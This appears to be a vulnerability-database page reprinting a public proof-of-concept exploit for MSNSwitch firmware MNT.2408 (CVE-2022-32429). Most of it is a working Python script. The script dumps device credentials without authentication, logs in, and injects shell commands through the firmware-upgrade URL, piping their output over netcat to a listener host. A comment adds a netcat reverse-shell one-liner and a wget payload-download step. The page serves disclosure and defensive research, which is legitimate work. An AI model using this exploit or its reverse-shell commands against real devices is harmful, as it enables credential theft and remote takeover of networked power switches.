Lucene search
+L

MSNSwitch Firmware MNT.2408 Remote Code Execution

🗓️ 11 Nov 2022 00:00:00Reported by Eli FulkersonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 244 Views

MSNSwitch Firmware MNT.2408 Remote Code Execution by Eli Fulkerson on 9/1/2022. Unauthenticated configuration dump leads to authenticated RCE on MNT.2408 firmware. Requires HTTP access and being on the same subnet as the device. Includes a POC for both vulnerabilities

Related
Code
ReporterTitlePublishedViews
Family
zdt
MSNSwitch Firmware MNT.2408 - Remote Code Exectuion Exploit
11 Nov 202200:00
zdt
attackerkb
CVE-2022-32429
10 Aug 202220:15
attackerkb
circl
CVE-2022-32429
11 Aug 202200:32
circl
cnnvd
MSNSwitch 授权问题漏洞
10 Aug 202200:00
cnnvd
cve
CVE-2022-32429
9 Aug 202200:00
cve
cvelist
CVE-2022-32429
9 Aug 202200:00
cvelist
exploitdb
MSNSwitch Firmware MNT.2408 - Remote Code Execution
11 Nov 202200:00
exploitdb
nuclei
MSNSwitch Firmware MNT.2408 - Authentication Bypass
14 Jul 202607:07
nuclei
nvd
CVE-2022-32429
10 Aug 202220:15
nvd
osv
CVE-2022-32429
10 Aug 202220:15
osv
Rows per page
`Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)  
Google Dork: n/a  
Date:9/1/2022  
Exploit Author: Eli Fulkerson  
Vendor Homepage: https://www.msnswitch.com/  
Version: MNT.2408  
Tested on: MNT.2408 firmware  
CVE: CVE-2022-32429  
  
#!/usr/bin/python3  
  
  
"""  
  
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.  
  
Configuration dump only requires HTTP access.  
Full RCE requires you to be on the same subnet as the device.  
  
"""   
  
import requests  
import sys  
import urllib.parse  
import readline  
import random  
import string  
  
  
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST  
LISTENER_HOST = "192.168.EDIT.ME"  
LISTENER_PORT = 3434  
  
# target msnswitch  
TARGET="192.168.EDIT.ME2"  
PORT=80  
  
USERNAME = None  
PASSWORD = None  
  
"""  
First vulnerability, unauthenticated configuration/credential dump  
"""  
if USERNAME == None or PASSWORD == None:  
# lets just ask  
hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  
session = requests.session()  
  
data = session.get(hack_url)  
for each in data.text.split('\n'):  
key = None  
val = None  
  
try:  
key = each.strip().split('=')[0]  
val = each.strip().split('=')[1]  
except:  
pass  
  
if key == "Account1":  
USERNAME = val  
if key == "Password1":  
PASSWORD = val  
  
"""  
Second vulnerability, authenticated command execution  
  
This only works on the local lan.  
  
for full reverse shell, modify and upload netcat busybox shell script to /tmp:  
  
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp  
  
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox  
"""  
  
session = requests.session()  
  
# initial login, establishes our Cookie  
burp0_url = f"http://{TARGET}:{PORT}/goform/login"  
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}  
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}  
session.post(burp0_url, headers=burp0_headers, data=burp0_data)  
  
# get our csrftoken  
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"  
data = session.get(burp0_url)  
  
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]  
  
while True:  
CMD = input('x:')  
CMD_u = urllib.parse.quote_plus(CMD)  
filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  
  
try:  
hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"  
  
session.get(hack_url, timeout=0.01)  
except requests.exceptions.ReadTimeout:  
pass  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation